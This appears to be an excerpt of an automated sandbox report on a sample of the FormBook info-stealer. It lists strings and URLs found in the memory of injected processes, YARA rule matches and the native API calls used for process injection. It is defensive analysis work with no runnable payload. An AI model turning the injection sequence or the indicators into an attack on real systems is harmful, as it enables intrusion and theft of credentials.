            Source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: isoburn.exe, 00000004.00000003.1952955984.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 00000004.00000002.4120710422.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1952955984.0000000002A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 00000004.00000003.1952955984.0000000002A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: isoburn.exe, 00000004.00000002.4120710422.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1952955984.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 00000004.00000003.1952955984.0000000002A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: isoburn.exe, 00000004.00000002.4120710422.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1952955984.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: isoburn.exe, 00000004.00000003.1952955984.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1952955984.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: isoburn.exe, 00000004.00000002.4120710422.00000000029E8000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1952955984.00000000029F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 00000004.00000003.1952306122.00000000074E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
            Source: isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: isoburn.exe, 00000004.00000003.1957408917.00000000074F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: isoburn.exe, 00000004.00000002.4122089347.0000000006682000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000004112000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4122089347.000000000553C000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000002FCC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000576/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: C:\Windows\SysWOW64\isoburn.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A953 NtMapViewOfSection,2_2_0040A953
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A123 NtSetContextThread,2_2_0040A123
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040B213 NtDelayExecution,2_2_0040B213
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040AB73 NtCreateFile,2_2_0040AB73
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A323 NtResumeThread,2_2_0040A323
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00428453 NtClose,2_2_00428453
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00409D23 NtSuspendThread,2_2_00409D23
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040ADA3 NtReadFile,2_2_0040ADA3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040B623 NtAllocateVirtualMemory,2_2_0040B623
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00409F23 NtGetContextThread,2_2_00409F23
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A733 NtCreateSection,2_2_0040A733
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2B60 NtClose,LdrInitializeThunk,2_2_015B2B60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_015B2DF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015B2C70
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B35C0 NtCreateMutant,LdrInitializeThunk,2_2_015B35C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B4340 NtSetContextThread,2_2_015B4340
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B4650 NtSuspendThread,2_2_015B4650
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BF0 NtAllocateVirtualMemory,2_2_015B2BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BE0 NtQueryValueKey,2_2_015B2BE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2B80 NtQueryInformationFile,2_2_015B2B80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BA0 NtEnumerateValueKey,2_2_015B2BA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AD0 NtReadFile,2_2_015B2AD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AF0 NtWriteFile,2_2_015B2AF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AB0 NtWaitForSingleObject,2_2_015B2AB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D10 NtMapViewOfSection,2_2_015B2D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D00 NtSetInformationFile,2_2_015B2D00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D30 NtUnmapViewOfSection,2_2_015B2D30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DD0 NtDelayExecution,2_2_015B2DD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DB0 NtEnumerateKey,2_2_015B2DB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C60 NtCreateKey,2_2_015B2C60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C00 NtQueryInformationProcess,2_2_015B2C00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CC0 NtQueryVirtualMemory,2_2_015B2CC0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CF0 NtOpenProcess,2_2_015B2CF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CA0 NtQueryInformationToken,2_2_015B2CA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F60 NtCreateProcessEx,2_2_015B2F60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F30 NtCreateSection,2_2_015B2F30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FE0 NtCreateFile,2_2_015B2FE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F90 NtProtectVirtualMemory,2_2_015B2F90
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FB0 NtResumeThread,2_2_015B2FB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FA0 NtQuerySection,2_2_015B2FA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2E30 NtWriteVirtualMemory,2_2_015B2E30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2EE0 NtQueueApcThread,2_2_015B2EE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2E80 NtReadVirtualMemory,2_2_015B2E80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2EA0 NtAdjustPrivilegesToken,2_2_015B2EA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3010 NtOpenDirectoryObject,2_2_015B3010
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3090 NtSetValueKey,2_2_015B3090
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B39B0 NtGetContextThread,2_2_015B39B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3D70 NtOpenThread,2_2_015B3D70
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3D10 NtOpenProcessToken,2_2_015B3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D4650 NtSuspendThread,LdrInitializeThunk,4_2_049D4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D4340 NtSetContextThread,LdrInitializeThunk,4_2_049D4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_049D2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_049D2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C60 NtCreateKey,LdrInitializeThunk,4_2_049D2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_049D2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_049D2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_049D2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_049D2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_049D2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_049D2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FB0 NtResumeThread,LdrInitializeThunk,4_2_049D2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FE0 NtCreateFile,LdrInitializeThunk,4_2_049D2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F30 NtCreateSection,LdrInitializeThunk,4_2_049D2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AD0 NtReadFile,LdrInitializeThunk,4_2_049D2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AF0 NtWriteFile,LdrInitializeThunk,4_2_049D2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_049D2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_049D2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_049D2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2B60 NtClose,LdrInitializeThunk,4_2_049D2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D35C0 NtCreateMutant,LdrInitializeThunk,4_2_049D35C0
